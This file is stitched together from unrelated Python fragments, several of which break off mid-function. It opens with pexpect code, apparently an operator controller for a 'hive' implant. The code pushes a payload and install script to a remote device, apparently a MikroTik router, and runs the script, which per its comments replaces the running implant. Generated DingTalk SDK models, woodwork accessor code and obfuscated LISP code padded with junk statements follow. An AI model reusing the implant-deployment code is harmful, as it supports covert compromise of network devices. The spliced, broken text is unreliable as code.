ctCommand= " cmd exec \"chmod 755 "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'tempPayload', 0)+"\""
cutT.sendline(ctCommand)
#
#
# Makes the tempPayload executable...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print "tempPayload executable response."
print cutT.before
print cutT.after
now=datetime.now()
print " Updated tempPayload is executable at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# The following line is specific to mikrotik routers for now...
#cutT.sendline(" file put installScript /rw/pckg/installScript")
ctCommand= " file put "+self.get('Payload', 'installation_Script_Name', 0)+" "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)
cutT.sendline(ctCommand)
#
#
# Sends the installScript...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+ " installed response."
print cutT.before
print cutT.after
now=datetime.now()
print " installScript ["+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+"] is put on device at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# This line is specific to mikrotik routers for now...
#cutT.sendline(" cmd exec \"chmod 755 /rw/pckg/installScript\"")
ctCommand= " cmd exec \"chmod 755 "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+"\""
cutT.sendline(ctCommand)
#
#
# Makes the installScript executable...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print "installedScript ["+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+" executable response."
print cutT.before
print cutT.after
now=datetime.now()
print " installScript is now executable at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# This line is specific to mikrotik routers for now...
now=datetime.now()
#cutT.sendline(" cmd exec /rw/pckg/installScript")
ctCommand= " cmd exec "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)
cutT.sendline(ctCommand)
#
#
# Runs the installScript ... Note that the hive trigger should now timeout
# since the install script should remove
# all currently running hive processes including
# our currently triggered implant and replace the
# existing hive with the new hive implant...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [ pexpect.TIMEOUT, response, 'Failure', pexpect.EOF] , timeout=int(self.defaultTimeout + 180) )
if index == 0:
print "Expected timeout occurred since the existing hive is currently being replaced..."
print cutT.before
print cutT.after
print " installScript ["+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+" was started at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
now=datetime.now()
print " Hive should have been replaced by now at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs after " + str( self.defaultTimeout + 180) + " seconds timeout."
elif index == 1:
print "Should never have gotten here for the response... ERROR ERROR ERROR"
print cutT.before
print cutT.after
elif index == 2:
print "Should never have gotten here for Failure... ERROR ERROR ERROR"
print cutT.before
print cutT.after
elif index == 3:
print "EOF occurred"
print cutT.before
print cutT.after
print "\n\n runSingleUpdateOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now ending..."
#Re-Establishing Connection to test update
self.runSingleResetOperation()
else:
self.logFinalOperationResult("--FAILURE, NO CONNECTION DURING runSingleUpdateOperation--")
#================================================================
def runSingleResetOperation(self):
'''
        Uses pexpect to connect to the target hive machine and then immediately disconnect, while
        maintaining a log file called cutthroat_hiveOperation_yyyymmdd_HHMMSS.log
'''
hiveTimeout = self.get('Remote','hiveTimeout',0)
#Establishes initial connection to hive server
self.runHiveConnectOperation()
#runHiveConnectOperation establishes cutT...
cutT = self.cutT
if self.connectionStatus == True:
print "\n\n runSingleResetOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
ctCommand= " quit "
cutT.sendline(ctCommand)
#
#
            # Closing Connection
temp_model.from_map(m['body'])
return self
class QueryCityCarApplyHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class QueryCityCarApplyRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
created_end_at: str = None,
created_start_at: str = None,
page_number: int = None,
page_size: int = None,
third_part_apply_id: str = None,
user_id: str = None,
):
        # Third-party corp ID
        self.corp_id = corp_id
        # Upper bound (exclusive) on the approval creation time
        self.created_end_at = created_end_at
        # Lower bound (inclusive) on the approval creation time
        self.created_start_at = created_start_at
        # Page number, must be >= 1, defaults to 1
        self.page_number = page_number
        # Page size, must be >= 1, defaults to 20
        self.page_size = page_size
        # Third-party approval form ID
        self.third_part_apply_id = third_part_apply_id
        # Third-party employee ID
        self.user_id = user_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.created_end_at is not None:
result['createdEndAt'] = self.created_end_at
if self.created_start_at is not None:
result['createdStartAt'] = self.created_start_at
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.third_part_apply_id is not None:
result['thirdPartApplyId'] = self.third_part_apply_id
if self.user_id is not None:
result['userId'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('createdEndAt') is not None:
self.created_end_at = m.get('createdEndAt')
if m.get('createdStartAt') is not None:
self.created_start_at = m.get('createdStartAt')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('thirdPartApplyId') is not None:
self.third_part_apply_id = m.get('thirdPartApplyId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
return self
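# A minimal usage sketch (hypothetical field values): these generated models round-trip through to_map()/from_map().
#   req = QueryCityCarApplyRequest(corp_id='corp123', page_number=1, page_size=20)
#   payload = req.to_map()                              # e.g. {'corpId': 'corp123', 'pageNumber': 1, 'pageSize': 20}
#   same = QueryCityCarApplyRequest().from_map(payload) # rebuilds an equivalent model from the dict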
class QueryCityCarApplyResponseBodyApplyListApproverList(TeaModel):
def __init__(
self,
note: str = None,
operate_time: str = None,
order: int = None,
status: int = None,
status_desc: str = None,
user_id: str = None,
user_name: str = None,
):
        # Approval note
        self.note = note
        # Approval time
        self.operate_time = operate_time
        # Approver ordering value
        self.order = order
        # Approval status enum: 0 - in review, 1 - approved, 2 - rejected
        self.status = status
        # Approval status description
        self.status_desc = status_desc
        # Approver employee ID
        self.user_id = user_id
        # Approver employee name
        self.user_name = user_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.note is not None:
result['note'] = self.note
if self.operate_time is not None:
result['operateTime'] = self.operate_time
if self.order is not None:
result['order'] = self.order
if self.status is not None:
result['status'] = self.status
if self.status_desc is not None:
result['statusDesc'] = self.status_desc
if self.user_id is not None:
result['userId'] = self.user_id
if self.user_name is not None:
result['userName'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('note') is not None:
self.note = m.get('note')
if m.get('operateTime') is not None:
self.operate_time = m.get('operateTime')
if m.get('order') is not None:
self.order = m.get('order')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('statusDesc') is not None:
self.status_desc = m.get('statusDesc')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('userName') is not None:
self.user_name = m.get('userName')
return self
class QueryCityCarApplyResponseBodyApplyListItineraryList(TeaModel):
def __init__(
self,
arr_city: str = None,
arr_city_code: str = None,
arr_date: str = None,
cost_center_id: int = None,
cost_center_name: str = None,
dep_city: str = None,
dep_city_code: str = None,
dep_date: str = None,
invoice_id: int = None,
invoice_name: str = None,
itinerary_id: str = None,
project_code: str = None,
project_title: str = None,
traffic_type: int = None,
):
        # Destination city
        self.arr_city = arr_city
        # Destination city three-letter code
        self.arr_city_code = arr_city_code
        # Arrival time at the destination city
        self.arr_date = arr_date
        # Internal cost center ID in the business travel system
        self.cost_center_id = cost_center_id
        # Cost center name
        self.cost_center_name = cost_center_name
        # Departure city
        self.dep_city = dep_city
        # Departure city three-letter code
        self.dep_city_code = dep_city_code
        # Departure time
        self.dep_date = dep_date
        # Internal invoice title ID in the business travel system
        self.invoice_id = invoice_id
        # Invoice title name
        self.invoice_name = invoice_name
        # Internal itinerary ID in the business travel system
        self.itinerary_id = itinerary_id
        # Project code
        self.project_code = project_code
        # Project name
        self.project_title = project_title
        # Transportation type: 4 - intra-city transport
        self.traffic_type = traffic_type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.arr_city is not None:
result['arrCity'] = self.arr_city
if self.arr_city_code is not None:
result['arrCityCode'] = self.arr_city_code
if self.arr_date is not None:
result['arrDate'] = self.arr_date
if self.cost_center_id is not None:
result['costCenterId'] = self.cost_center_id
if self.cost_center_name is not None:
result['costCenterName'] = self.cost_center_name
if self.dep_city is not None:
result['depCity'] = self.dep_city
if self.dep_city_code is not None:
result['depCityCode'] = self.dep_city_code
if self.dep_date is not None:
result['depDate'] = self.dep_date
if self.invoice_id is not None:
result['invoiceId'] = self.invoice_id
if self.invoice_name is not None:
result['invoiceName'] = self.invoice_name
if self.itinerary_id is not None:
result['itineraryId'] = self.itinerary_id
if self.project_code is not None:
result['projectCode'] = self.project_code
if self.project_title is not None:
result['projectTitle'] = self.project_title
if self.traffic_type is not None:
result['trafficType'] = self.traffic_type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('arrCity') is not None:
self.arr_city = m.get('arrCity')
if m.get('arrCityCode') is not None:
self.arr_city_code = m.get('arrCityCode')
if m.get('arrDate') is not None:
self.arr_date = m.get('arrDate')
if m.get('costCenterId') is not None:
self.cost_center_id = m.get('costCenterId')
if m.get('costCenterName') is not None:
self.cost_center_name = m.get('costCenterName')
if m.get('depCity') is not None:
self.dep_city = m.get('depCity')
if m.get('depCityCode') is not None:
self.dep_city_code = m.get('depCityCode')
if m.get('depDate') is not None:
self.dep_date = m.get('depDate')
if m.get('invoiceId') is not None:
self.invoice_id = m.get('invoiceId')
if m.get('invoiceName') is not None:
self.invoice_name = m.get('invoiceName')
if m.get('itineraryId') is not None:
self.itinerary_id = m.get('itineraryId')
if m.get('projectCode') is not None:
self.project_code = m.get('projectCode')
if m.get('projectTitle') is not None:
self.project_title = m.get('projectTitle')
if m.get('trafficType') is not None:
self.traffic_type = m.get('trafficType')
return self
class QueryCityCarApplyResponseBodyApplyList(TeaModel):
def __init__(
self,
approver_list: List[QueryCityCarApplyResponseBodyApplyListApproverList] = None,
depart_id: str = None,
depart_name: str = None,
gmt_create: str = None,
gmt_modified: str = None,
itinerary_list: List[QueryCityCarApplyResponseBodyApplyListItineraryList] = None,
status: int = None,
status_desc: str = None,
third_part_apply_id: str = None,
trip_cause: str = None,
trip_title: str = None,
user_id: str = None,
user_name: str = None,
):
        # List of approvers
        self.approver_list = approver_list
        # Department ID of the employee
        self.depart_id = depart_id
        # Department name of the employee
        self.depart_name = depart_name
        # Creation time
        self.gmt_create = gmt_create
        # Last modified time
        self.gmt_modified = gmt_modified
        # Itineraries associated with the approval form
        self.itinerary_list = itinerary_list
        # Approval form status: 0 - applied, 1 - approved, 2 - rejected
        self.status = status
        # Approval form status description (0 - applied, 1 - approved, 2 - rejected)
        self.status_desc = status_desc
        # Third-party approval form ID
        self.third_part_apply_id = third_part_apply_id
        # Reason for the trip application
        self.trip_cause = trip_cause
        # Approval form title
        self.trip_title = trip_title
        # ID of the employee who initiated the approval
        self.user_id = user_id
        # Name of the employee who initiated the approval
        self.user_name = user_name
def validate(self):
if self.approver_list:
for k in self.approver_list:
if k:
k.validate()
if self.itinerary_list:
for k in self.itinerary_list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['approverList'] = []
if self.approver_list is not None:
for k in self.approver_list:
result['approverList'].append(k.to_map() if k else None)
if self.depart_id is not None:
result['departId'] = self.depart_id
if self.depart_name is not None:
result['departName'] = self.depart_name
if self.gmt_create is not None:
result['gmtCreate'] = self.gmt_create
if self.gmt_modified is not None:
result['gmtModified'] = self.gmt_modified
result['itineraryList'] = []
if self.itinerary_list is not None:
for k in self.itinerary_list:
result['itineraryList'].append(k.to_map() if k else None)
if self.status is not None:
result['status'] = self.status
if self.status_desc is not None:
result['statusDesc'] = self.status_desc
if self.third_part_apply_id is not None:
result['thirdPartApplyId'] = self.third_part_apply_id
if self.trip_cause is not None:
result['tripCause'] = self.trip_cause
if self.trip_title is not None:
result['tripTitle'] = self.trip_title
if self.user_id is not None:
result['userId'] = self.user_id
if self.user_name is not None:
result['userName'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
self.approver_list = []
if m.get('approverList') is not None:
for k in m.get('approverList'):
temp_model = QueryCityCarApplyResponseBodyApplyListApproverList()
self.approver_list.append(temp_model.from_map(k))
if m.get('departId') is not None:
self.depart_id = m.get('departId')
if m.get('departName') is not None:
self.depart_name = m.get('departName')
if m.get('gmtCreate') is not None:
self.gmt_create = m.get('gmtCreate')
if m.get('gmtModified') is not None:
self.gmt_modified = m.get('gmtModified')
self.itinerary_list = []
if m.get('itineraryList') is not None:
for k in m.get('itineraryList'):
temp_model = QueryCityCarApplyResponseBodyApplyListItineraryList()
self.itinerary_list.append(temp_model.from_map(k))
if m.get('status') is not None:
self.status = m.get('status')
if m.get('statusDesc') is not None:
self.status_desc = m.get('statusDesc')
if m.get('thirdPartApplyId') is not None:
            self.third_part_apply_id = m.get('thirdPartApplyId')
import copy
import warnings
import weakref
import pandas as pd
from woodwork.accessor_utils import (
_check_column_schema,
_is_dataframe,
_is_series,
init_series,
)
from woodwork.column_schema import ColumnSchema
from woodwork.exceptions import ParametersIgnoredWarning, TypingInfoMismatchWarning
from woodwork.indexers import _iLocIndexer, _locIndexer
from woodwork.logical_types import _NULLABLE_PHYSICAL_TYPES, LatLong, Ordinal
from woodwork.statistics_utils import _get_box_plot_info_for_column
from woodwork.table_schema import TableSchema
from woodwork.utils import (
_get_column_logical_type,
_is_valid_latlong_series,
import_or_none,
)
dd = import_or_none("dask.dataframe")
ks = import_or_none("databricks.koalas")
class WoodworkColumnAccessor:
def __init__(self, series):
self._series_weakref = weakref.ref(series)
self._schema = None
def init(
self,
logical_type=None,
semantic_tags=None,
use_standard_tags=True,
description=None,
origin=None,
metadata=None,
schema=None,
validate=True,
):
"""Initializes Woodwork typing information for a Series.
Args:
logical_type (LogicalType or str, optional): The logical type that should be assigned
to the series. If no value is provided, the LogicalType for the series will
be inferred. If the LogicalType provided or inferred does not have a dtype that
is compatible with the series dtype, an error will be raised.
semantic_tags (str or list or set, optional): Semantic tags to assign to the series.
Defaults to an empty set if not specified. There are two options for
specifying the semantic tags:
(str) If only one semantic tag is being set, a single string can be passed.
(list or set) If multiple tags are being set, a list or set of strings can be passed.
use_standard_tags (bool, optional): If True, will add standard semantic tags to the series
based on the inferred or specified logical type of the series. Defaults to True.
description (str, optional): Optional text describing the contents of the series.
origin (str, optional): Optional text specifying origin of the column (i.e. "base" or "engineered").
metadata (dict[str -> json serializable], optional): Metadata associated with the series.
schema (Woodwork.ColumnSchema, optional): Typing information to use for the Series instead of performing inference.
Any other arguments provided will be ignored. Note that any changes made to the schema object after
initialization will propagate to the Series. Similarly, to avoid unintended typing information changes,
the same schema object should not be shared between Series.
validate (bool, optional): Whether parameter and data validation should occur. Defaults to True. Warning:
Should be set to False only when parameters and data are known to be valid.
Any errors resulting from skipping validation with invalid inputs may not be easily understood.
"""
if schema is not None:
if validate:
_validate_schema(schema, self._series)
extra_params = []
if logical_type is not None:
extra_params.append("logical_type")
if semantic_tags is not None:
extra_params.append("semantic_tags")
if description is not None:
extra_params.append("description")
if origin is not None:
extra_params.append("origin")
if metadata is not None:
extra_params.append("metadata")
if not use_standard_tags:
extra_params.append("use_standard_tags")
if extra_params:
warnings.warn(
"A schema was provided and the following parameters were ignored: "
+ ", ".join(extra_params),
ParametersIgnoredWarning,
)
self._schema = schema
else:
logical_type = _get_column_logical_type(
self._series, logical_type, self._series.name
)
if validate:
self._validate_logical_type(logical_type)
self._schema = ColumnSchema(
logical_type=logical_type,
semantic_tags=semantic_tags,
use_standard_tags=use_standard_tags,
description=description,
origin=origin,
metadata=metadata,
validate=validate,
)
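    # A minimal usage sketch (assumed example data; `ww` is the accessor namespace this class backs):
    #   s = pd.Series(['a', 'b', 'b'], dtype='category', name='letters')
    #   s.ww.init(semantic_tags='demo')      # logical type inferred from the dtype (Categorical here)
    #   s.ww.semantic_tags                   # includes 'demo' plus standard tags when use_standard_tags=True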
@property
def _series(self):
return self._series_weakref()
@property
def schema(self):
return copy.deepcopy(self._schema)
@property
@_check_column_schema
def nullable(self):
"""Whether the column can contain null values."""
dtype = self._schema.logical_type._get_valid_dtype(type(self._series))
return dtype in _NULLABLE_PHYSICAL_TYPES
@property
@_check_column_schema
def description(self):
"""The description of the series"""
return self._schema.description
@description.setter
@_check_column_schema
def description(self, description):
self._schema.description = description
@property
@_check_column_schema
def origin(self):
"""The origin of the series"""
return self._schema.origin
@origin.setter
@_check_column_schema
def origin(self, origin):
self._schema.origin = origin
@property
@_check_column_schema
def iloc(self):
"""
Integer-location based indexing for selection by position.
``.iloc[]`` is primarily integer position based (from ``0`` to
``length-1`` of the axis), but may also be used with a boolean array.
If the selection result is a Series, Woodwork typing information will
be initialized for the returned Series.
Allowed inputs are:
An integer, e.g. ``5``.
A list or array of integers, e.g. ``[4, 3, 0]``.
A slice object with ints, e.g. ``1:7``.
A boolean array.
A ``callable`` function with one argument (the calling Series, DataFrame
or Panel) and that returns valid output for indexing (one of the above).
This is useful in method chains, when you don't have a reference to the
calling object, but would like to base your selection on some value.
"""
return _iLocIndexer(self._series)
@property
@_check_column_schema
def loc(self):
"""
Access a group of rows by label(s) or a boolean array.
``.loc[]`` is primarily label based, but may also be used with a
boolean array.
If the selection result is a Series, Woodwork typing information will
be initialized for the returned Series.
Allowed inputs are:
A single label, e.g. ``5`` or ``'a'``, (note that ``5`` is
interpreted as a *label* of the index, and **never** as an
integer position along the index).
A list or array of labels, e.g. ``['a', 'b', 'c']``.
A slice object with labels, e.g. ``'a':'f'``.
A boolean array of the same length as the axis being sliced,
e.g. ``[True, False, True]``.
An alignable boolean Series. The index of the key will be aligned before
masking.
An alignable Index. The Index of the returned selection will be the input.
A ``callable`` function with one argument (the calling Series or
DataFrame) and that returns valid output for indexing (one of the above)
"""
return _locIndexer(self._series)
@property
@_check_column_schema
def logical_type(self):
"""The logical type of the series"""
return self._schema.logical_type
@property
@_check_column_schema
def metadata(self):
"""The metadata of the series"""
return self._schema.metadata
@metadata.setter
@_check_column_schema
def metadata(self, metadata):
self._schema.metadata = metadata
@property
@_check_column_schema
def semantic_tags(self):
"""The semantic tags assigned to the series"""
return self._schema.semantic_tags
@property
@_check_column_schema
def use_standard_tags(self):
return self._schema.use_standard_tags
def __eq__(self, other, deep=True):
if not self._schema.__eq__(other._schema, deep=deep):
return False
if self._series.name != other._series.name:
return False
if deep and isinstance(self._series, pd.Series):
return self._series.equals(other._series)
return True
@_check_column_schema
def __getattr__(self, attr):
# Called if method is not present on the Accessor
# If the method is present on Series, uses that method.
if hasattr(self._series, attr):
return self._make_series_call(attr)
else:
raise AttributeError(f"Woodwork has no attribute '{attr}'")
@_check_column_schema
def __repr__(self):
msg = "<Series: {} ".format(self._series.name)
msg += "(Physical Type = {}) ".format(self._series.dtype)
msg += "(Logical Type = {}) ".format(self.logical_type)
msg += "(Semantic Tags = {})>".format(self.semantic_tags)
return msg
def _make_series_call(self, attr):
"""Forwards the requested attribute onto the series object. Intercepts return value,
attempting to initialize Woodwork with the current schema when a new Series is returned.
Confirms schema is still valid for the original Series."""
series_attr = getattr(self._series, attr)
if callable(series_attr):
def wrapper(*args, **kwargs):
# Make Series call and intercept the result
result = series_attr(*args, **kwargs)
# Try to initialize Woodwork with the existing schema
if _is_series(result):
valid_dtype = self._schema.logical_type._get_valid_dtype(
type(result)
)
if str(result.dtype) == valid_dtype:
result.ww.init(schema=self.schema, validate=False)
else:
invalid_schema_message = (
"dtype mismatch between original dtype, "
f"{valid_dtype}, and returned dtype, {result.dtype}"
)
warning_message = (
TypingInfoMismatchWarning().get_warning_message(
attr, invalid_schema_message, "Series"
)
)
warnings.warn(warning_message, TypingInfoMismatchWarning)
elif _is_dataframe(result):
# Initialize Woodwork with a partial schema
col_schema = self.schema
col_name = self.name or result.columns.to_list()[0]
table_schema = TableSchema(
column_names=[col_name],
logical_types={col_name: col_schema.logical_type},
semantic_tags={col_name: col_schema.semantic_tags},
column_metadata={col_name: col_schema.metadata},
use_standard_tags={col_name: col_schema.use_standard_tags},
column_descriptions={col_name: col_schema.description},
column_origins={col_name: col_schema.origin},
validate=False,
)
result.ww.init_with_partial_schema(table_schema)
# Always return the results of the Series operation whether or not Woodwork is initialized
return result
return wrapper
# Directly return non-callable Series attributes
return series_attr
def _validate_logical_type(self, logical_type):
"""Validates that a logical type is consistent with the series dtype. Performs additional type
specific validation, as required."""
valid_dtype = logical_type._get_valid_dtype(type(self._series))
if valid_dtype != str(self._series.dtype):
raise ValueError(
f"Cannot initialize Woodwork. Series dtype '{self._series.dtype}' is "
f"incompatible with {logical_type} dtype. Try converting series "
f"dtype to '{valid_dtype}' before initializing or use the "
"woodwork.init_series function to initialize."
)
if isinstance(logical_type, Ordinal):
logical_type._validate_data(self._series)
elif isinstance(logical_type, LatLong):
if not _is_valid_latlong_series(self._series):
raise ValueError(
"Cannot initialize Woodwork. Series does not contain properly formatted "
"LatLong data. Try reformatting before initializing or use the "
"woodwork.init_series function to initialize."
)
@_check_column_schema
def add_semantic_tags(self, semantic_tags):
"""Add the specified semantic tags to the set of tags.
Args:
semantic_tags (str/list/set): New semantic tag(s) to add
"""
self._schema._add_semantic_tags(semantic_tags, self._series.name)
@_check_column_schema
def remove_semantic_tags(self, semantic_tags):
"""Removes specified semantic tags from the current tags.
Args:
semantic_tags (str/list/set): Semantic tag(s) to remove.
"""
self._schema._remove_semantic_tags(semantic_tags, self._series.name)
@_check_column_schema
def reset_semantic_tags(self):
"""Reset the semantic tags to the default values. The default values
        will be either an empty set or a set of standard tags based on the column's logical type.
% i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
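# The *_G / *_P constants below appear to be Diffie-Hellman generator and prime-modulus parameters for the LISP crypto cipher suites.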
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 95 - 95: ooOoO0o / ooOoO0o
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 41 - 41: i1IIi - I11i - Ii1I
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
